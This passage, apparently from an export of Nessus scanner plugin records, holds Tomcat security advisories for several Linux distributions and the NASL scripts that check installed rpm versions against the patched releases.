\"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:37", "description": "This update for tomcat to 8.0.53 fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with supplementary characters could have lead to an infinite loop in the decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8034: The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could have resulted in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also have resulted in a user seeing a response intended for another user (bsc#1102410).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\nBug fixes :\n\n - bsc#1067720: Avoid overwriting of customer's configuration during update.\n\n - bsc#1095472: Add Obsoletes for tomcat6 packages.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {}, "published": "2018-09-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2018-1019)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc", "p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-3_1-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1019.NASL", "href": "https://www.tenable.com/plugins/nessus/117526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1019.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117526);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2018-1019)\");\n script_summary(english:\"Check for the openSUSE-2018-1019 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tomcat to 8.0.53 fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the\n UTF-8 decoder with supplementary characters could have\n lead to an infinite loop in the decoder causing a Denial\n of Service (bsc#1102400).\n\n - CVE-2018-8034: The host name verification when using TLS\n with the WebSocket client was missing. It is now enabled\n by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the\n application at the same time as the container triggered\n the async timeout, a race condition existed that could\n have resulted in a user seeing a response intended for a\n different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the\n closure of the connection when an async request was\n completed by the application and timed out by the\n container at the same time. This could also have\n resulted in a user seeing a response intended for\n another user (bsc#1102410).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings\n (bsc#1093697).\n\nBug fixes :\n\n - bsc#1067720: Avoid overwriting of customer's\n configuration during update.\n\n - bsc#1095472: Add Obsoletes for tomcat6 packages.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1067720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-3_1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-admin-webapps-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-docs-webapp-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-el-3_0-api-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-embed-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-javadoc-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-jsp-2_3-api-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-jsvc-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-lib-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-servlet-3_1-api-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-webapps-8.0.53-15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:46", "description": "Security Fix(es) :\n\n - tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n - tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n - tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)", "cvss3": {}, "published": "2019-08-27T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : tomcat on SL7.x x86_64 (20190806)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2020-02-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:tomcat", "p-cpe:/a:fermilab:scientific_linux:tomcat-admin-webapps", "p-cpe:/a:fermilab:scientific_linux:tomcat-docs-webapp", "p-cpe:/a:fermilab:scientific_linux:tomcat-el-2.2-api", "p-cpe:/a:fermilab:scientific_linux:tomcat-javadoc", "p-cpe:/a:fermilab:scientific_linux:tomcat-jsp-2.2-api", "p-cpe:/a:fermilab:scientific_linux:tomcat-jsvc", "p-cpe:/a:fermilab:scientific_linux:tomcat-lib", "p-cpe:/a:fermilab:scientific_linux:tomcat-servlet-3.0-api", "p-cpe:/a:fermilab:scientific_linux:tomcat-webapps", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20190806_TOMCAT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/128266", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128266);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n\n script_name(english:\"Scientific Linux Security Update : tomcat on SL7.x x86_64 (20190806)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - tomcat: Incorrect handling of empty string URL in\n security constraints can lead to unintended exposure of\n resources (CVE-2018-1304)\n\n - tomcat: Late application of security constraints can\n lead to resource exposure for unauthorised users\n (CVE-2018-1305)\n\n - tomcat: Insecure defaults in CORS filter enable\n 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket\n client (CVE-2018-8034)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1908&L=SCIENTIFIC-LINUX-ERRATA&P=24724\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2aa9ccdd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:04", "description": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 8.5.0 to 8.5.30. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 8.5.0 to 8.5.31.(CVE-2018-8034)\n\nA bug in the tracking of connection closures can lead to reuse of user sessions in a new connection. Versions Affected: Apache Tomcat 8.5.5 to 8.5.31.(CVE-2018-8037)", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 (ALAS-2018-1056)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2018-08-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1056.NASL", "href": "https://www.tenable.com/plugins/nessus/111611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1056.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111611);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/08/31 12:25:01\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_xref(name:\"ALAS\", value:\"2018-1056\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 (ALAS-2018-1056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with\nsupplementary characters can lead to an infinite loop in the decoder\ncausing a Denial of Service. Versions Affected: Apache Tomcat 8.5.0 to\n8.5.30. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 8.5.0 to 8.5.31.(CVE-2018-8034)\n\nA bug in the tracking of connection closures can lead to reuse of user\nsessions in a new connection. Versions Affected: Apache Tomcat 8.5.5\nto 8.5.31.(CVE-2018-8037)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1056.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat8' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.5.32-1.78.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat8 